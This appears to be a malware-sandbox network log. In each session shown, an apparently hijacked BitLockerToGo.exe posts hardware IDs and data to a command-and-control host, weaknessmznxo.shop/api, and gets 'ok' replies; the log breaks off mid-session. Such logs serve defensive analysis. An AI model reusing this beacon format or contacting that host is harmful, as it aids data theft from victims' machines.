                    Set-Cookie: PHPSESSID=7silta19o5ehen2q64b1p8i0b2; expires=Tue, 19-Nov-2024 12:20:44 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LgWdj5ItcwWxaxbD1rjp%2BEqJf9ITb832N9GV10IopX39BITKsv67f3hVVDEHQFhXcXT8kcZqy9FrdhyFPL7TF4g2NURG8%2BHRvUetz9jhLipnkv4RXe2cvmPqwqP507k%2BYri23bE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b556c908c9b-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-26 18:34:05 UTC567INData Raw: 31 64 61 65 0d 0a 7a 65 54 31 4b 42 57 37 69 6f 4a 61 36 31 33 79 7a 4b 52 44 73 63 62 59 5a 39 4c 39 51 36 4f 76 78 4a 4f 67 5a 39 57 69 6b 52 43 32 78 6f 4d 4b 4c 34 2b 6d 6f 43 6d 4f 66 38 69 34 31 6a 62 55 36 76 6f 47 74 74 39 35 78 63 36 6f 34 4d 56 4c 39 39 54 38 4d 76 65 43 6c 45 52 6d 33 71 61 67 50 35 4e 2f 79 4a 66 66 59 64 53 6f 2b 6c 33 77 6d 43 6e 42 7a 71 6a 78 77 51 79 36 30 76 31 7a 70 59 69 53 51 48 44 59 37 75 4d 32 68 6a 69 58 71 63 55 70 33 36 2b 31 44 37 2f 66 62 34 48 4b 76 72 47 61 52 5a 6a 48 35 58 47 41 68 59 5a 44 4e 38 61 6d 2b 58 69 4f 4d 39 44 32 68 69 4c 55 70 4c 51 42 74 70 59 72 79 38 65 67 38 4d 51 4e 70 63 76 33 65 4b 57 47 6b 55 46 36 30 66 72 75 50 49 45 7a 6b 61 50 46 59 5a 33 6b 76 52 33 77 78 32 47 53 2f 36 58 67 30
                    Data Ascii: 1daezeT1KBW7ioJa613yzKRDscbYZ9L9Q6OvxJOgZ9WikRC2xoMKL4+moCmOf8i41jbU6voGtt95xc6o4MVL99T8MveClERm3qagP5N/yJffYdSo+l3wmCnBzqjxwQy60v1zpYiSQHDY7uM2hjiXqcUp36+1D7/fb4HKvrGaRZjH5XGAhYZDN8am+XiOM9D2hiLUpLQBtpYry8eg8MQNpcv3eKWGkUF60fruPIEzkaPFYZ3kvR3wx2GS/6Xg0
                    2024-07-26 18:34:05 UTC1369INData Raw: 64 66 76 39 6e 69 57 63 59 6e 75 77 53 32 54 2f 50 6f 4c 74 5a 41 7a 77 4e 2b 6a 2f 39 41 4a 73 73 62 2b 63 61 47 47 6b 6b 31 36 31 2b 37 6e 4f 34 45 37 6b 61 44 4b 4b 39 43 67 75 55 58 2b 33 79 62 5a 6a 66 36 78 38 77 61 7a 78 2b 46 78 6f 63 61 49 42 47 36 5a 37 2b 78 34 30 58 2b 61 71 4d 73 6f 32 4b 4f 79 43 61 4b 55 4c 73 4c 45 6f 66 66 49 42 72 2f 4b 39 58 79 75 67 5a 4a 4e 5a 64 66 6a 37 54 75 44 4f 64 44 67 68 69 62 4c 35 4f 4a 46 6e 70 77 77 31 2f 2b 6c 34 4e 4e 46 71 49 37 71 4d 71 69 4b 31 78 49 33 30 4f 44 76 4e 59 51 31 6e 71 76 4c 4b 4e 4b 6c 74 77 4f 37 6e 69 6e 4a 79 61 48 78 78 67 69 34 7a 76 4e 38 70 34 4f 54 51 48 36 5a 70 71 41 2f 6b 58 2f 49 37 76 59 73 33 36 2b 32 52 34 57 63 4c 38 2f 4b 73 4c 48 64 53 36 36 41 39 48 37 76 33 74 64 59
                    Data Ascii: dfv9niWcYnuwS2T/PoLtZAzwN+j/9AJssb+caGGkk161+7nO4E7kaDKK9CguUX+3ybZjf6x8wazx+FxocaIBG6Z7+x40X+aqMso2KOyCaKULsLEoffIBr/K9XyugZJNZdfj7TuDOdDghibL5OJFnpww1/+l4NNFqI7qMqiK1xI30ODvNYQ1nqvLKNKltwO7ninJyaHxxgi4zvN8p4OTQH6ZpqA/kX/I7vYs36+2R4WcL8/KsLHdS66A9H7v3tdY
                    2024-07-26 18:34:05 UTC1369INData Raw: 51 2f 69 48 2f 65 37 73 45 35 6b 2f 7a 36 4d 36 43 53 4c 65 2f 47 71 76 69 43 47 76 6e 5a 73 33 57 6a 78 73 38 4b 63 39 58 67 36 6a 65 41 4e 5a 71 68 7a 79 48 62 72 62 4d 47 73 4a 4d 6e 77 4d 47 71 2f 4d 63 47 73 73 33 32 63 71 4f 42 6b 45 73 33 6c 36 6a 6e 49 4d 6c 6e 30 4a 37 4c 4c 64 69 6f 2b 44 43 7a 6b 53 2f 47 32 2b 62 75 6a 42 7a 33 78 2f 38 79 39 38 61 59 53 33 72 54 34 2b 34 30 69 44 2b 55 72 63 77 68 33 4b 47 38 44 62 6d 66 4d 38 62 43 70 2f 44 4a 44 72 72 4f 39 6e 4f 71 67 64 63 45 4e 39 37 77 6f 47 44 4a 45 72 6d 55 68 6a 36 64 76 66 6f 43 76 4e 39 35 67 63 6d 73 38 63 38 50 76 4d 2f 77 64 61 47 47 6d 6b 42 6c 30 65 6a 67 4e 6f 38 2b 6e 4b 76 48 4c 64 43 32 74 67 4f 39 6d 53 6e 54 6a 65 69 78 78 52 33 33 6d 4c 4e 53 70 49 71 55 52 6e 62 65 71
                    Data Ascii: Q/iH/e7sE5k/z6M6CSLe/GqviCGvnZs3Wjxs8Kc9Xg6jeANZqhzyHbrbMGsJMnwMGq/McGss32cqOBkEs3l6jnIMln0J7LLdio+DCzkS/G2+bujBz3x/8y98aYS3rT4+40iD+Urcwh3KG8DbmfM8bCp/DJDrrO9nOqgdcEN97woGDJErmUhj6dvfoCvN95gcms8c8PvM/wdaGGmkBl0ejgNo8+nKvHLdC2tgO9mSnTjeixxR33mLNSpIqURnbeq
                    2024-07-26 18:34:05 UTC1369INData Raw: 77 6d 62 7a 46 4c 64 32 6a 74 41 6d 2b 6b 69 76 43 77 4f 61 2f 67 67 4b 76 67 4b 73 79 67 34 47 61 5a 48 7a 56 37 36 41 6e 78 79 62 51 71 63 70 68 69 2b 53 32 44 37 79 57 49 63 6a 49 72 76 72 4c 41 4c 62 4c 39 6e 47 70 69 35 68 44 5a 64 50 72 37 6a 75 46 4d 35 61 76 78 54 50 62 72 66 70 4c 38 4a 67 35 67 5a 58 6d 30 4d 77 49 6f 38 66 6a 4d 72 44 49 6a 67 70 77 31 61 69 34 65 49 6f 2b 6e 36 33 48 4c 4e 57 74 73 67 57 32 6d 69 37 4d 77 36 48 32 77 67 69 35 7a 2f 56 36 6f 6f 71 63 52 48 37 66 36 4f 45 79 79 58 48 51 71 64 35 68 69 2b 53 4b 42 72 43 66 4f 6f 48 53 36 4f 69 43 41 72 75 41 71 7a 4b 39 6a 4a 35 4b 64 4e 62 76 35 44 4f 46 4f 70 57 68 78 53 6a 57 72 62 51 58 75 5a 45 70 79 63 4b 6a 2b 73 49 49 76 63 7a 7a 63 65 2f 49 31 30 31 76 6d 62 43 67 43 6f
                    Data Ascii: wmbzFLd2jtAm+kivCwOa/ggKvgKsyg4GaZHzV76AnxybQqcphi+S2D7yWIcjIrvrLALbL9nGpi5hDZdPr7juFM5avxTPbrfpL8Jg5gZXm0MwIo8fjMrDIjgpw1ai4eIo+n63HLNWtsgW2mi7Mw6H2wgi5z/V6ooqcRH7f6OEyyXHQqd5hi+SKBrCfOoHS6OiCAruAqzK9jJ5KdNbv5DOFOpWhxSjWrbQXuZEpycKj+sIIvczzce/I101vmbCgCo
                    2024-07-26 18:34:05 UTC1369INData Raw: 77 43 37 61 70 37 6b 4d 74 35 63 74 79 38 36 68 73 59 78 46 73 4e 69 7a 4b 75 2b 6c 67 46 70 36 6d 66 65 75 49 63 6b 34 6e 4f 36 65 59 64 75 70 73 67 2b 30 6d 43 7a 47 79 36 2f 6a 79 77 43 35 77 50 64 35 6f 49 43 54 53 58 66 4c 37 75 51 77 69 6a 4b 64 6f 4d 55 6c 6b 2b 72 36 41 71 6a 66 65 59 48 2f 71 2f 2f 5a 43 72 44 52 2b 54 4b 77 79 49 34 4b 63 4e 57 6f 75 48 69 4e 4d 59 4b 6c 78 79 72 59 71 72 30 4b 74 5a 55 68 7a 73 6d 6c 2f 38 6b 45 74 4d 6a 2b 66 36 47 4d 6e 6b 4e 77 31 65 7a 6e 65 4d 64 2f 6c 37 61 47 65 5a 4f 50 6d 79 69 63 6d 44 75 42 30 75 6a 6f 67 67 4b 37 67 4b 73 79 6f 34 2b 62 51 48 7a 65 34 75 34 78 68 7a 53 43 76 4d 55 6c 30 4b 32 35 41 72 6d 52 49 63 62 49 71 50 62 44 44 72 50 4b 38 48 54 76 79 4e 64 4e 62 35 6d 77 6f 42 53 4b 50 35 32
                    Data Ascii: wC7ap7kMt5cty86hsYxFsNizKu+lgFp6mfeuIck4nO6eYdupsg+0mCzGy6/jywC5wPd5oICTSXfL7uQwijKdoMUlk+r6AqjfeYH/q//ZCrDR+TKwyI4KcNWouHiNMYKlxyrYqr0KtZUhzsml/8kEtMj+f6GMnkNw1ezneMd/l7aGeZOPmyicmDuB0ujoggK7gKsyo4+bQHze4u4xhzSCvMUl0K25ArmRIcbIqPbDDrPK8HTvyNdNb5mwoBSKP52
                    2024-07-26 18:34:05 UTC1369INData Raw: 61 57 39 44 62 32 4e 49 73 37 43 6f 76 48 4e 41 37 48 42 2f 48 53 6f 6a 35 5a 43 63 4a 6d 6d 6f 44 2b 52 66 38 6a 75 36 43 62 51 6f 50 6f 61 2f 6f 5a 68 78 73 48 6d 71 59 49 46 76 63 72 35 66 4b 2b 42 68 55 78 2b 32 65 76 79 4f 34 38 33 6c 71 4c 4b 4c 4e 75 74 75 67 43 37 6b 69 72 4d 79 36 62 36 77 30 58 35 67 50 52 71 37 39 37 58 65 33 72 58 37 4f 34 37 6d 54 6a 51 73 59 67 34 6b 36 4f 32 52 65 6a 66 4c 73 6a 66 6f 66 54 4b 44 4c 66 4f 2b 6e 75 6f 67 70 52 4c 63 39 58 6e 36 54 75 42 50 70 69 68 78 53 48 59 72 4c 41 45 76 70 70 68 6a 34 32 68 36 59 4a 64 39 2b 2f 77 64 36 53 48 31 57 31 78 33 75 53 67 4a 38 63 6d 30 4b 6e 4b 59 59 76 6b 75 51 47 2b 6c 69 37 46 78 36 48 78 78 51 4f 33 79 50 68 2f 70 4a 53 53 52 48 4c 59 36 4f 45 33 68 54 2b 43 71 38 67 71
                    Data Ascii: aW9Db2NIs7CovHNA7HB/HSoj5ZCcJmmoD+Rf8ju6CbQoPoa/oZhxsHmqYIFvcr5fK+BhUx+2evyO483lqLKLNutugC7kirMy6b6w0X5gPRq797Xe3rX7O47mTjQsYg4k6O2RejfLsjfofTKDLfO+nuogpRLc9Xn6TuBPpihxSHYrLAEvpphj42h6YJd9+/wd6SH1W1x3uSgJ8cm0KnKYYvkuQG+li7Fx6HxxQO3yPh/pJSSRHLY6OE3hT+Cq8gq
                    2024-07-26 18:34:05 UTC194INData Raw: 75 65 6d 43 66 45 79 72 61 7a 37 41 36 6a 78 37 4d 38 37 34 6e 58 45 6b 36 5a 6f 4b 41 48 78 33 2b 49 37 70 35 68 35 71 65 30 43 37 65 4a 4d 49 7a 6a 6f 66 66 48 41 71 65 43 33 58 6d 37 67 64 63 45 4e 39 2b 6f 75 47 6a 48 66 35 53 2f 68 6e 6d 44 39 75 46 51 34 38 68 78 6b 39 4c 6f 36 49 49 54 39 35 69 68 50 4f 2b 55 31 78 49 33 6e 75 76 79 4b 6f 38 38 68 71 32 42 48 2b 32 6e 72 41 69 2f 6c 43 44 2f 38 34 6a 38 77 77 61 35 67 73 4a 6b 6f 70 61 55 54 33 44 6e 31 75 34 2f 6e 54 69 65 71 4d 5a 68 6e 65 53 31 52 65 69 6d 59 59 6d 4e 6d 62 2b 43 48 66 65 59 73 30 65 73 69 4a 0d 0a
                    Data Ascii: uemCfEyraz7A6jx7M874nXEk6ZoKAHx3+I7p5h5qe0C7eJMIzjoffHAqeC3Xm7gdcEN9+ouGjHf5S/hnmD9uFQ48hxk9Lo6IIT95ihPO+U1xI3nuvyKo88hq2BH+2nrAi/lCD/84j8wwa5gsJkopaUT3Dn1u4/nTieqMZhneS1ReimYYmNmb+CHfeYs0esiJ
                    2024-07-26 18:34:05 UTC1369INData Raw: 32 34 37 32 0d 0a 6c 4e 59 63 69 6c 77 79 36 45 4d 4a 75 76 68 6d 2b 54 6f 76 70 64 34 4e 46 68 78 64 7a 6d 71 5a 4a 58 37 4a 57 67 4a 66 2f 55 69 41 52 75 6d 66 36 67 59 4e 74 78 30 4c 79 47 65 5a 50 6a 74 41 69 78 6e 43 2f 43 33 37 54 33 77 52 4f 30 68 38 31 4d 6a 6f 75 63 52 6e 72 57 34 39 34 47 71 44 4b 62 6f 73 73 75 32 4a 71 45 45 4c 4f 52 4c 38 62 62 74 37 47 4d 52 62 69 41 71 30 76 76 7a 74 64 31 4f 5a 6e 77 6f 47 44 4a 43 70 4f 67 79 43 62 46 74 66 63 6b 76 5a 51 74 7a 4d 4b 74 73 59 78 46 73 59 43 72 49 75 48 47 6b 31 73 33 67 62 69 79 59 39 78 73 78 2f 36 55 50 70 32 39 2b 68 50 77 78 33 4f 50 6a 62 53 78 6d 6b 58 77 77 2b 46 67 71 59 57 42 53 54 44 6e 31 73 4d 76 6e 7a 57 4c 37 4f 41 6d 77 71 32 73 43 4b 4b 68 48 2b 2f 41 70 2f 4c 4d 52 34 62
                    Data Ascii: 2472lNYcilwy6EMJuvhm+Tovpd4NFhxdzmqZJX7JWgJf/UiARumf6gYNtx0LyGeZPjtAixnC/C37T3wRO0h81MjoucRnrW494GqDKbossu2JqEELORL8bbt7GMRbiAq0vvztd1OZnwoGDJCpOgyCbFtfckvZQtzMKtsYxFsYCrIuHGk1s3gbiyY9xsx/6UPp29+hPwx3OPjbSxmkXww+FgqYWBSTDn1sMvnzWL7OAmwq2sCKKhH+/Ap/LMR4b
                    2024-07-26 18:34:05 UTC1369INData Raw: 39 62 46 45 53 4b 4b 76 37 42 71 6c 6e 47 4a 37 74 42 68 69 2f 62 30 52 61 4c 66 65 59 47 4b 70 65 50 51 41 37 54 57 38 44 57 52 75 4c 46 4a 5a 74 50 4a 37 53 69 4f 41 61 36 37 78 53 2f 64 6f 36 77 55 38 4e 46 68 7a 6f 33 2b 79 49 4a 4e 2b 38 62 77 5a 4f 2b 35 32 51 70 76 6d 62 43 67 44 59 6f 78 6e 71 6e 51 4d 4a 36 43 75 52 53 36 76 69 7a 52 79 75 61 2f 67 67 50 33 6d 4b 41 38 37 34 4b 47 43 69 2b 4a 75 72 74 74 32 6d 6a 41 2f 4e 6c 76 79 75 53 73 52 65 6a 4e 62 34 48 66 35 71 6d 43 51 72 54 53 34 58 53 73 6b 4a 51 4e 53 65 66 64 34 7a 61 48 4f 49 61 62 78 54 44 51 70 4c 45 37 6a 72 34 76 79 73 71 71 35 2f 77 37 67 73 50 39 66 4b 69 51 68 67 6f 35 6d 65 65 67 59 4c 42 2f 32 4f 37 35 62 35 4f 38 2b 6c 33 77 71 69 4c 50 77 36 48 6e 30 30 69 43 77 2b 4a 78
                    Data Ascii: 9bFESKKv7BqlnGJ7tBhi/b0RaLfeYGKpePQA7TW8DWRuLFJZtPJ7SiOAa67xS/do6wU8NFhzo3+yIJN+8bwZO+52QpvmbCgDYoxnqnQMJ6CuRS6vizRyua/ggP3mKA874KGCi+Jurtt2mjA/NlvyuSsRejNb4Hf5qmCQrTS4XSskJQNSefd4zaHOIabxTDQpLE7jr4vysqq5/w7gsP9fKiQhgo5meegYLB/2O75b5O8+l3wqiLPw6Hn00iCw+Jx


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449733172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:06 UTC284OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 18168
                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e
                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
                    2024-07-26 18:34:06 UTC2837OUTData Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33
                    Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
                    2024-07-26 18:34:06 UTC806INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: PHPSESSID=siv7jk31e62jpdm887oacoqkjt; expires=Tue, 19-Nov-2024 12:20:45 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pkkc%2Fmwk%2FAl0qQIBY%2FvmwHZpyy9vkYWuDdiLg3gseLKFwhiWlCJbQgnGrUCiIKMB9uRp9pTO6OGVjxAS%2BaYgQti0LHQGnAffI%2BO9cwhxGUmoXOZtTpOHqymPX7ihoSAxGlgTxJk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b5e1cd27cf6-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-26 18:34:06 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                    Data Ascii: eok 8.46.123.33
                    2024-07-26 18:34:06 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449734172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:07 UTC283OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8789
                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:07 UTC8789OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e
                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
                    2024-07-26 18:34:08 UTC804INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: PHPSESSID=vmg2r3fceq18u14sr222rj7m4r; expires=Tue, 19-Nov-2024 12:20:46 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FuShXpB9sx%2FV5sOt%2BfKRoKOD0di7dpLwxGQI2vAvp0%2FjYsMtfhflAt1zV5xgUjr94J4i4iFeSWmpg7F4o6S%2BUTQ3a9hUpqMLjacOU5I61WhIiVKfrgCruYDZQd42DnjHqueXAFU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b658d8143cb-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-26 18:34:08 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                    Data Ascii: eok 8.46.123.33
                    2024-07-26 18:34:08 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449735172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:08 UTC284OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 20442
                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e
                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
                    2024-07-26 18:34:08 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                    Data Ascii: `M?lrQMn 64F6(X&7~`
                    2024-07-26 18:34:09 UTC806INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: PHPSESSID=toafdacstq7elsbr6cpr2td6ec; expires=Tue, 19-Nov-2024 12:20:48 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zb7AebNcHIAloajCd6cvEX0KNDAvc8z67SKdE%2BCD%2Bwqp4tnuJBd%2BVrHGo3fcgAaygs%2F3ZVHl7f1u5AoQwCWcQSSsjIRa%2FO1ccjzTdSRFWjBYYe82Fx3qRBuL0h0dN9YesVXO4Mo%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b6e7b444372-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-26 18:34:09 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                    Data Ascii: eok 8.46.123.33
                    2024-07-26 18:34:09 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449736172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:10 UTC283OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 1279
